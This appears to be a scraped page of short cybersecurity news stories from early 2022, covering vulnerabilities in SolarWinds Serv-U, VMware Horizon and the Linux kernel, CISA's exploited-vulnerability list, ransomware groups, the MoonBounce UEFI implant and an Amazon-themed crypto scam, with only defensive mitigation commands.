Information Technology

Microsoft researchers have discovered a previously undisclosed vulnerability in the SolarWinds Serv-U software while monitoring threats related to Log4J vulnerabilities. Jonathan Bar Or explained on Twitter that while he was hunting for a Log4J exploit attempt, he noticed attacks coming from serv-u.exe. 

more Log4j

“Taking a closer looked revealed you could feed Ssrv-U with data and it’ll build a LDAP query with your unsanitized input! This could be used for log4j attack attempts, but also for LDAP injection,” he wrote. “Solarwinds immediately responded, investigated and fixed the #vulnerability. Their response is the quickest I’ve seen, really amazing work on their part!”Microsoft later released a blog about the issue, tracked as as CVE-2021-35247, and said it is an “input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.”In their advisory, SolarWinds said the Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized.”SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream affect has been detected as the LDAP servers ignored improper characters,” the company said, adding that it affects 15.2.5 and previous versions. 

NTT Application Security’s Ray Kelly told ZDNet that the vulnerability surprised and concerned him considering SolarWinds is fresh on the heels of their previous breach that affected thousands of customers. “Given that the Log4j disclosure was published in December, this Open Source vulnerability should have been of the utmost priority for SolarWinds. While it appears that SolarWinds was not susceptible to have the vulnerable component exploited, it’s still not something want in your software product,” Kelly said. “Most all application security products can detect the Log4j vulnerability giving developers the ability to quickly identify and fix issue.” Microsoft urged customers to apply the security updates explained in the SolarWinds advisory and said customers can use their tools to identify and remediate devices that have the vulnerability. Microsoft Defender Antivirus and Microsoft Defender for Endpoint also detect behavior related to the activity, they added. Netenrich’s John Bambenek added that Microsoft’s warning and SolarWinds’ quick response time represented a positive example of how vulnerabilities need to be dealt with.  “This is the kind of vulnerability and research cooperation we need, where a major tech company with visibility to see the attacks reaches out to the software company and a fix is rushed to production,” Bambenek said.  More

CISA released its latest update to the Known Exploited Vulnerabilities catalog, adding 13 new vulnerabilities. Nine of the vulnerabilities have a remediation date of February 1 and four of them have a remediation date of July 18. The list includes an October CMS Improper Authentication, a System Information Library for node.js Command Injection vulnerability, an Oracle Corporate Business Intelligence Enterprise Edition Path Traversal vulnerability, an Apache Airflow Experimental API Authentication Bypass vulnerability, a Drupal Core Unrestricted Upload of File vulnerability, and three Nagios XI OS Command Injection vulnerabilities.
CISA
The October CMS Improper Authentication — CVE-2021-32648 — was allegedly used during a cyberattack on Ukrainian government systems last week. A patch was released in September 2021. The Media Trust CEO Chris Olson said the vulnerability’s alleged use in the recent attack on Ukraine explains the software’s inclusion on the list but he noted that its inclusion highlights “an alarming growth in web-based cyberattacks and the role they will play in global cyber warfare.” “Little attention is paid to the Web as an attack surface. While organizations across the public and private sector are increasingly aware of cyber risk, the stack of third-party code used in Web development rarely meets the standards for AppSec that those organizations would demand from any of their IT systems,” Olson said. Jordan LaRose, director of incident response at F-Secure, told ZDNet that CISA’s guidance matches much of what they are seeing in the wild from a malicious actor standpoint. LaRose said that what stood out most to him was that these are all vulnerabilities affecting web servers or APIs. This is a trend LaRose said he has seen develop significantly in the past year among malicious actors, many of whom are turning to more than just classical methods like phishing or trojans to gain footholds in organizations with strong security postures. 

“What we’re seeing now is a wave of attacks where attackers are targeting technology rather than people, with the most recent notable example being the Log4Shell attacks. These attacks are largely done opportunistically, with attackers loading up scanning scripts with the exploits and hitting everything they can on the internet to find a potential victim,” he said. Neosec vice president Edward Roberts echoed that sentiment, adding that the volume of vulnerabilities involving APIs will continue to increase because there are more APIs being developed each day. Most organizations, he said, “don’t even know how many APIs they have, let alone which ones have vulnerabilities, let alone consider how they are being defrauded by abusive behavior.”A number of cybersecurity experts noted that several of these vulnerabilities were identified months ago. Some of the vulnerabilities on the list date back to 2012 and 2013 according to Netenrich principal threat hunter John Bambenek, who expressed concerns about the fact that they haven’t already been patched.  “That the agency doesn’t have basic patch deployment information from other units of government implies there is no central management of that information. The posture of federal IT cybersecurity seems to have remained stalled at square one,” Bambenek said. “If an exploited vulnerability can be used to execute commands on the victim machine, then CISA sets a two week due date to patch. That being said, two weeks is far too slow. The exchange vulnerability concerns me the most, however, some of this stuff is quite off the beaten path. But, this may be common in government installations so worthy to put on the list.”Vulcan Cyber CPO Tal Morgenstern noted that seven of the vulnerabilities with remediation dates of February 1 relate to systems management tools.”Systems management tools from VMware, Nagios, F5, Npm and more hold the keys to the kingdom giving the user substantial power to automate system change for good or bad. This isn’t a new concern as we’ve seen an unfortunate trend of vulnerabilities in systems management software tools this year,” Morgenstern explained. “Considering the amount of access and control these tools have, IT security teams must take immediate steps to fully mitigate known risks. Don’t wait for February. Move now.” More

According to several cybersecurity companies monitoring the situation, attackers are still targeting VMware Horizon servers through Log4J vulnerabilities. 

More VMWare

Two weeks ago, the UK’s National Health Service (NHS) issued a warning that an ‘unknown threat group’ is attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and complete other malicious attacks. Since then, several cybersecurity companies have confirmed that hackers are continuing to target VMware Horizon servers. In a statement to ZDNet, VMware said they are continuing to urge customers to apply the latest guidance found in their security advisory, VMSA-2021-0028, in order to resolve vulnerabilities CVE-2021-44228 and CVE-2021-4504. “We also recommend that customers visit our corresponding Questions & Answers document for the latest information and join the VMware Security-Announce mailing list for all future advisories. Any service connected to the internet and not yet patched for Log4j vulnerabilities CVE-2021-44228 and CVE-2021-4504 is vulnerable to hackers, and VMware strongly recommends patching,” a VMware spokesperson said. Rapid7 said it began monitoring a sudden increase in VMware Horizon exploitation on January 14 and identified five unique avenues that attackers have taken post-exploitation, signaling that multiple actors are involved in this mass exploitation activity.”The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system,” Rapid7 explained.Huntress released its own blog about the issue, noting that according to Shodan, about 25,000 Horizon servers are currently internet-accessible worldwide.

Roger Koehler, vice president of threat operations at Huntress, told ZDNet the NHS article didn’t give an idea of the scope of the problem. “Based on how many Horizon servers in our data set are unpatched (only 18% were patched as of last Friday night), there is a high risk of this seriously impacting hundreds-if not in the low thousands-of businesses. This weekend also marks the first time we’ve seen proof of widespread escalation, going from gaining initial access to starting to take hostile actions on Horizon servers,” Koehler said. “Since we’re seeing multiple likely unrelated campaigns (cryptominers, web shells, Cobalt Strike), it’s likely that this will continue to escalate. Attackers are going to make businesses pay for not fully patching when VMware gave their initial guidance. Although the initial web shell campaign appears to focus on long-term access, it’s likely that future activity will focus on targeting or impacting the systems accessible via VMware Horizon. And it makes sense-attackers can use this access to impact all the virtualized hosts and servers.” Koehler added that these are high-value targets, and people are not patching despite multiple, widespread campaigns targeting them, noting that they recently witnessed this happen with ProxyShell and ProxyLogon. While these are not quite as significant and far-reaching as this latest cyberattack, these vulnerabilities serve as evidence that attackers will likely be back to target those systems that haven’t yet been patched, Koehler explained. He said ProxyShell surfaced months after ProxyLogon was disclosed, and it was made possible only because many had failed to properly patch. “The timing is also significant. If we think back to the big Kaseya incident, they picked the July 4 holiday weekend. The original widespread intrusion with web shells took place over the Christmas holiday (they were dropped between December 25 and December 29), and things are escalating now that it’s another three-day weekend in the US. Is damage control going to become a holiday tradition for those in cybersecurity?” Koehler said.”The web shell attack between December 25 and 29 was more sophisticated compared to something like the Exchange attack. It seems like the majority of antivirus tools failed to identify that anything was wrong and still haven’t caught up. The moral of this story? It’s the same old song: patch, patch, patch.” More

Cyber criminals are becoming anxious about being tracked down by law enforcement agencies following the high-profile arrests of suspected members of one of the most notorious ransomware groups.  On January 14, Russia’s Federal Security Service (FSB) announced it had detained members of the REvil ransomware gang operating from several regions of the country and dismantled the group’s operations. Previous action by Europol resulted in the arrest of a suspected REvil affiliate near the Polish and Ukranian border. 

ZDNet Recommends

According to analysis of chatter on Dark Web forums by cybersecurity researchers at Trustwave SpiderLabs, the recent arrests, particularly those by Russia, appear to have scared cyber criminals, some of whom appear to be worried that they might be next.  SEE: A winning strategy for cybersecurity (ZDNet special report) Ransomware is one of the biggest cybersecurity issues facing organisations and the wider world today, with a string of incidents demonstrating how such attacks can impact utilities, healthcare, food production and other vital services that people need everyday, while cyber criminals can walk away with huge sums of money when victims give in and pay the ransoms required for a decryption key.    There’s a consensus among cybersecurity experts that many of the major ransomware operations work out of Russia, with the authorities willing to turn a blind eye towards attacks targeting the West. But following arrests throughout the region, some cyber criminals are wondering if the risk is worth it.  “This is a big change. I have no desire to go to jail,” wrote one forum member. 

“In fact, one thing is clear, those who expect that the state would protect them will be greatly disappointed,” said another.  There’s even concern that administrators of the dark web communities – who would have details about their users – could be coerced into working for law enforcement following arrest.  Such is the paranoia among some forum members and ransomware affiliates that they suggest moving operations to a different jurisdiction, although this is unlikely to be a realistic option for many.  “Those that are seasoned in cybercrime understand that by moving outside of Russia, they’ll be taking on an even greater risk of being arrested by international law enforcement agencies. These agencies that are keeping tabs on cyber criminals will be watching for such potential moves,” Ziv Mador, VP security research at Trustwave SpiderLabs, told ZDNet.  “Also, there is a large talent pool in Russia already, so more members and affiliates can always be recruited. Recruiting can become more difficult in other geographies. There is a level of trust that is required, and that trust diminishes the further away a prospective member is from ‘home base’,” he added.  SEE: My stolen credit card details were used 4,500 miles away. I tried to find out how it happened  However, while some users are anxious following the arrests, some are less sympathetic, blaming a string of high-profile attacks against major targets in the United States for the unwelcome attention. “It was necessary to think before climbing and encrypting multi-billion-dollar companies, schools, states. With whom did they dare to compete?” one user wrote.  “They climbed everywhere indiscriminately without understanding which country [they were attacking],” said another.  “Some cyber criminals may feel like REvil spoiled the ability to earn a living by attracting too much law enforcement attention and political powers. This kind of activity may have triggered a lack of sympathy by forum members,” said Mador.  
MORE ON CYBERSECURITY More

Most reported Linux “security” bugs actually aren’t Linux bugs. For example, security vendor CrowdStrike’s report on the biggest Linux-based malware families was really about system administration security blunders with telnet, SSH, and Docker, not Linux at all. But, that doesn’t mean Linux doesn’t have security holes.  For example, a new nasty Linux kernel problem has just popped up.  

In this one, there’s a heap overflow bug in the legacy_parse_param in the Linux kernel’s fs/fs_context.c program. This parameter is used in Linux filesystems during superblock creation for mount and superblock reconfiguration for a remount. The superblock records all of a filesystem’s characteristics such as file size, block size, empty and filled storage blocks. So, yeah, it’s important.  The legacy_parse_param() “PAGE_SIZE – 2 – size” calculation was mistakenly made an unsigned type. This means a large value of “size” results in a high positive value instead of a negative value as expected. Whoops.  This, in turn, meant you copy data beyond the memory slab allocated for it. And, as all programmers know, writing beyond the memory your program is supposed to have access to is a terrible thing. One big reason why Rust is being incorporated into Linux is that Rust makes this kind of memory mistake much harder to do. As every C developer knows, it’s all too easy to trip over memory allocation in a C program.  So, how bad is it? By the Common Vulnerability Scoring System (CVSS) v3.1 scoring test, it’s a solid 7.7. That’s considered a high-security vulnerability.  A local attacker can use it to escalate their user privileges or crash the system. This can be done with a specially crafted program that triggers this integer overflow. That done, it’s trivial to execute arbitrary code and give the attacker root privileges.

To exploit it requires the CAP_SYS_ADMIN privilege to be enabled. If that’s the case,  an unprivileged local user can open a filesystem that does not support the File System Context application programming interface (API). In this situation, it drops back to legacy handling, and from there, the flaw can escalate an attacker’s system privileges.  Exploiting is not as hard to do as you might think. Its discoverer, Linux kernel developer William Liu reports he created exploits against Ubuntu 20.04 and container escape exploits against Google’s hardened Container-Optimized (COS). This security hole was introduced back on Feb 28, 2019, in the Linux 5.1-rc1 kernel. It’s now present in all Linux kernels. Yes, all of them. Fortunately, the patch is in.   You can also disable it by disabling user namespaces by setting user.max_user_namespaces to with the following shell code on the Red Hat Linux family. echo “user.max_user_namespaces=0” > /etc/sysctl.d/userns.confsysctl -p /etc/sysctl.d/userns.confOn Ubuntu and related distros, you can protect your system with this shellcode:  sysctl -w kernel.unprivileged_userns_clone=0However, keep in mind that you must have namespace available on containerized Linux distros, such as Red Hat OpenShift Container Platform since it needs this functionality enabled. In these circumstances, you’ll need to patch your Linux distro as soon as your distributor makes the patch available. Stay safe, stay patched.
Related stories: More

The Federal Bureau of Investigations (FBI) has detailed evidence connecting the new Diavol ransomware to TrickBot Group, the prolific gang behind the eponymous banking trojan. Diavol hit researchers’ radars in mid-2021 when Fortinet published a technical analysis of Diavol that established some links to Wizard Spider, another name for Trickbot Group, which researchers have also been tracking in connection with the “double extortion” Ryuk ransomware. 

ZDNet Recommends

Ryuk is selectively deployed against high-value targets that are subjected to a double extortion racket, where their data is encrypted, stolen and then potentially leaked unless a ransom is paid.  SEE: A winning strategy for cybersecurity (ZDNet special report)Trickbot’s tools include the Anchor_DNS backdoor, a tool for transmitting data between victim machines and Trickbot-controlled servers using Domain Name System (DNS) tunneling to hide malicious traffic with normal DNS traffic. The FBI has been on to Diavol since October. Its link between Diavol and Trickbot is that the unique bot identifier (Bot ID) generated by Diavol for each victim is “nearly identical” to the format used by Trickbot and Anchor_DNS malware. Once the Bot ID is generated by Diavol, files on that machine are encrypted and appended with the “.lock64″ file extension and the machine displays the ransom message.”Diavol is associated with developers from the Trickbot Group, who are responsible for the Trickbot Banking Trojan,” the FBI said in a new flash note, warning that it has seen extortion demands up to $500,000.

Unlike Ryuk, the FBI has not seen Diavol leak victim data, despite the group’s message containing a threat to do so. Diavol’s ransom note states: “Take into consideration that we have also downloaded data from your network That In case of not making payment will be published on our news website.””Diavol encrypts files solely using an RSA encryption key, and its code is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker,” the FBI said. “While ransom demands have ranged from $10,000 to $500,000, Diavol actors have been willing to engage victims in ransom negotiations and accept lower payments.”Although the FBI acknowledges some victims have negotiated down ransoms with Diavol actors, it still discourages agreements since it doesn’t guarantee files will be recovered and advises against payment because it might embolden the attackers and fund future attacks. On the other hand, the FBI expresses sympathy for victims that do negotiate with attackers. “The FBI understands that when victims are faced with an inability to function, all options are evaluated to protect shareholders, employees and customers. The FBI may be able to provide threat mitigation resources to those impacted by Diavol ransomware,” it said.SEE: Your cybersecurity training needs improvement because hacking attacks are only getting worseThe FBI is also calling on victim organizations to share with it “boundary logs showing communication to and from foreign IP addresses, Bitcoin wallet information, the decryptor file, and/or a benign sample of an encrypted file.”But providing mitigation resources is different to helping recover paid funds. In Colonial Pipeline’s case, the FBI and Justice Department recovered about half of the extorted funds by using the Bitcoin public ledger to trace the payments back to “a specific address, for which the FBI has the ‘private key,’ or the rough equivalent of a password needed to access assets accessible from the specific Bitcoin address.” But not every victim organization is a critical infrastructure provider that attracts the attention of the White House, which has since called on the Kremlin to take action against ransomware attacks located in Russia. Russian authorities last week conducted a rare raid against members of REvil, which has links to DarkSide.     More

Security researchers have unveiled MoonBounce, a custom UEFI firmware implant used in targeted attacks. 

The implant is believed to be the work of APT41, a Chinese-speaking sophisticated hacking group also known as Winnti or Double Dragon.  On January 20, Kaspersky researchers said that at the end of last year, the team uncovered a case of Unified Extensible Firmware Interface (UEFI) compromise caused by the modification of one component in the firmware — a core element called SPI flash, located on the motherboard. “Due to its emplacement on SPI flash, which is located on the motherboard instead of the hard disk, the implant is capable of persisting in the system across disk formatting or replacement,” the team noted. Not only did the tweak to the firmware result in persistence at a level that is extremely difficult to remove, but the team also says that the firmware image was “modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.” The developer of the MoonBounce UEFI rootkit is said to have a deep and thorough understanding of how UEFI systems work. “The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table, namely AllocatePool, CreateEventEx and ExitBootServices,” the researchers explained. “Those hooks are used to divert the flow of these functions to malicious shellcode that the attackers append to the CORE_DXE image, which in turn sets up additional hooks in subsequent components of the boot chain, namely the Windows loader.”

“This multistage chain of hooks facilitates the propagation of malicious code from the CORE_DXE image to other boot components during system startup, allowing the introduction of a malicious driver to the memory address space of the Windows kernel.” Kaspersky says that this single patch turned the UEFI firmware “into a highly stealthy and persistent storage for malware in the system” — and one which was made more difficult to detect as there was no need to add new drivers or make further changes.  In addition, the infection chain operates in memory-only, and so there are no traces on the hard drive of the fileless attack.  Kaspersky has not been able to obtain a sample of the payload yet, nor has the team discovered how the initial infection occurred, although it is presumed that the infection was achieved remotely.  However, non-UEFI implants were found on the targeted network, including ScrambleCross/SideWalk malware, which communicated with the attackers’ same infrastructure. Through the analysis of this activity, likely attribution has been possible.  To the best of Kaspersky’s knowledge, APT41 is the advanced persistent threat (APT) group behind the intrusion. The Chinese-speaking APT is a state-sponsored outfit believed to be responsible for widespread attacks against the IT sector, social media companies, telecoms, non-profits, and healthcare.  In terms of the victim organization, in this case, Kaspersky mentioned a target that “corresponds to an organization in control of several enterprises dealing with transport technology.” In September 2020, the US Department of Justice (DoJ) filed charges against five suspected members of APT41. “We can now say that UEFI threats are gradually becoming a norm,” Kaspersky says. “With this in mind, vendors are taking more precautions to mitigate attacks like MoonBounce, for example, by enabling Secure Boot by default. We assess that, in this ongoing arms race, attacks against UEFI will continue to proliferate, with attackers evolving and finding ways to exploit and bypass current security measures.”
Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

A new cryptocurrency-related scam is abusing the Amazon brand to dupe would-be investors into handing over Bitcoin (BTC). 

Cryptocurrency and digital token scams have become a common threat facing investors and the general public today. Even though regulators worldwide are clamping down on fraud – through tax legislation, securities offering registration, tighter rules surrounding cryptocurrency adverts, and by keeping a close eye on initial coin offerings (ICOs), exit scams, rug pulls, and theft is still rampant.  Interest in cryptocurrency – and now NFTs – continues to escalate, providing a breeding ground for new scams to appear on a daily basis.  Chainalysis estimates that fraudsters received approximately $14 billion in deposits in 2021.  On Thursday, cybersecurity researchers from Akamai Technologies outlined a new, fraudulent campaign that leverages Amazon’s name to promote a fraudulent “Amazon to create its own digital token” scheme.  Generating panic and encouraging victims to make a rash decision are common tactics used in a variety of scams and this is no exception. In the Amazon scheme, the fraudsters have imposed a ‘time-sensitive’ lure to make individuals feel like they could be losing out on a lucrative investment opportunity.

The campaign began by publishing fake social media posts in groups that are interested in the cryptocurrency space. If users clicked on a post, they were directed to a fake “CNBC Decoded” news website that included an article on the soon-to-be-released ‘Amazon crypto token.’The cyberattackers gave visitors roughly 30 seconds to read the fake release before they were automatically redirected to a domain that offered pre-sale tokens. The website in question was fully functional and required signing up, email account confirmation, and user profile creation. 
Akamai Technologies
“The website included social engineering techniques that presented a fake progress bar, indicating tokens were about to sell out, adding pressure to the victim’s purchasing decision,” Akamai says.   At this stage, visitors were asked to then pay for the pre-sale tokens with their own cryptocurrency, including Bitcoin (BTC) and Ethereum (ETH). As the tokens are non-existent, these funds then ended up in the wallets of attackers.  Another lure is also presented – a fake referral program that promises rewards if users refer friends and family. This can expand the reach of the token scam on behalf of the attackers with no further effort on their part.  In total, most of the visitors to the fake token landing pages were using mobile devices (98%). The distribution of mobile operating systems in use is fairly even but leans toward Android handsets (56%), followed by Apple iOS (42%).  The majority of victims are located in North America, South America, and Asia.   “Based on our research, we predict that crypto scams will continue to drive many nefarious activities throughout the 2022 threat landscape,” the researchers commented.  Akamai has reported its findings to Amazon.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More